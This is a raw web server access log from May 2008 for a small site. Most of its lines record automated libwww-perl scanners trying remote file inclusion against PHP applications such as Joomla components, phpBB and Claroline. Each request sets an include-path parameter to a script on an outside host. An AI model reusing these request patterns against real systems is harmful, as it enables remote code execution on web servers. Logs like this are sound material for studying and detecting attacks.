213.250.85.20 - - [28/May/2008:09:00:03 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.60.59.94 - - [28/May/2008:09:00:04 -0700] "GET /logs/index.php?config=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.60.59.94 - - [28/May/2008:09:00:07 -0700] "GET /index.php?config=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:09:00:31 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:09:00:31 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:09:00:31 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.198.133 - - [28/May/2008:09:00:34 -0700] "GET /logs//nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [28/May/2008:09:00:35 -0700] "GET //nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:00:54 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [28/May/2008:09:00:56 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://o-x-r-a-n-a.ru/forum/language/.lang/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:09:01:10 -0700] "GET /logs/access_080201.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:09:01:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:09:01:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:01:28 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:01:28 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:01:29 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:09:01:37 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:01:57 -0700] "GET /logs/access_071225.log/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:02:02 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:02:07 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:02:19 -0700] "GET /logs/access_080326.log//db.php?commonpath=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:02:21 -0700] "GET //db.php?commonpath=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:02:23 -0700] "GET /logs//db.php?commonpath=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:02:25 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [28/May/2008:09:02:25 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:02:40 -0700] "GET /logs/access_080327.log/components/com_simpleboard/image_upload.php?sbp=http://www.freewebtown.com/cioabi/teid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.20.46.121 - - [28/May/2008:09:02:48 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [28/May/2008:09:02:49 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:02:57 -0700] "GET /logs/access_080301.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.a-clima.ru/netcat/dump/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:03:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:03:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:04:49 -0700] "GET /show_news.php?cutepath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:04:49 -0700] "GET /logs/show_news.php?cutepath=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:05:05 -0700] "GET /logs//index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:05:07 -0700] "GET /logs/access_080106.log//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:05:07 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:05:07 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:05:08 -0700] "GET //index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:05:10 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:05:11 -0700] "GET /components/com_extcalendar/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:05:14 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:09:05:14 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.148.29.218 - - [28/May/2008:09:05:49 -0700] "GET /logs/access_080218.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:06:15 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:06:15 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:16 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:17 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:17 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:17 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:06:17 -0700] "GET /logs/access_080218.log//claroline/phpbb/page_tail.php?includePath=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:24 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:24 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:06:25 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:06:29 -0700] "GET /logs/access.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:06:55 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:06:55 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:06:59 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.10.53 - - [28/May/2008:09:06:59 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:07:14 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:07:14 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:07:23 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:07:24 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:07:25 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:09:07:26 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.11.142.67 - - [28/May/2008:09:07:29 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1602.1060-big; Windows XP 5.1; MSIE 7.0.5730.11)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:07:31 -0700] "GET /logs/access_071212.log//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:07:31 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:07:31 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:35 -0700] "GET /logs/access_071212.log//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:35 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:35 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:36 -0700] "GET /logs/access_071212.log//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:36 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:37 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [28/May/2008:09:07:40 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:41 -0700] "GET /logs/access_071212.log//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:41 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:07:41 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:08:05 -0700] "GET /logs/access_071212.log//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:08:05 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:08:05 -0700] "GET /logs//forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:09:08:05 -0700] "GET /logs//citywriter/head.php?path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:09:08:05 -0700] "GET /logs/access_080215.log//modules/TotalCalendar/about.php?inc_dir=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:09:08:05 -0700] "GET //citywriter/head.php?path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:08:24 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.174.62.136 - - [28/May/2008:09:09:01 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:09:22 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:09:22 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:09:23 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:09:24 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.57.128.159 - - [28/May/2008:09:09:43 -0700] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.flat-bellies.com/brs/data/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.57.128.159 - - [28/May/2008:09:09:44 -0700] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.flat-bellies.com/brs/data/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:09:54 -0700] "GET //forum/admin/addentry.php?phpbb_root_path=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.148.29.218 - - [28/May/2008:09:10:43 -0700] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:09:10:46 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:10:56 -0700] "GET /logs/access_080106.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:10:56 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:10:56 -0700] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.65.47.4 - - [28/May/2008:09:11:05 -0700] "GET /bbs/skin/zero_vote/ask_password.php?dir=http://mobed.yonsei.ac.kr/course_egboard.ico?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:30 -0700] "GET /logs/access_080106.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:30 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:30 -0700] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:32 -0700] "GET /logs/access_080106.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:32 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:32 -0700] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:37 -0700] "GET /logs/access_080106.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:37 -0700] "GET /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:11:37 -0700] "GET /logs/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.180 - - [28/May/2008:09:11:43 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:11:45 -0700] "GET /logs/access_080201.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:04 -0700] "GET / HTTP/1.1" 200 11602 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:05 -0700] "GET /blog HTTP/1.1" 301 85 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:05 -0700] "GET /blog/ HTTP/1.1" 200 11607 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:07 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 1806 "-" "Java/1.6.0_04" "dmulk.com"
89.29.195.27 - - [28/May/2008:09:12:07 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:08 -0700] "GET /blog/xmlrpc.php HTTP/1.1" 200 59 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:09 -0700] "GET /blog/index.php/feed HTTP/1.1" 200 6205 "-" "Java/1.6.0_04" "dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:09 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1013 "-" "Java/1.6.0_04" "dmulk.com"
74.55.113.226 - - [28/May/2008:09:12:17 -0700] "GET /logs/access_080201.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:12:17 -0700] "GET /logs/access_080201.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:09:12:17 -0700] "GET /logs/access_080201.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.162.98.149 - - [28/May/2008:09:12:19 -0700] "GET /blog/index.php/category/motorcycles HTTP/1.1" 200 10625 "-" "Java/1.6.0_04" "dmulk.com"
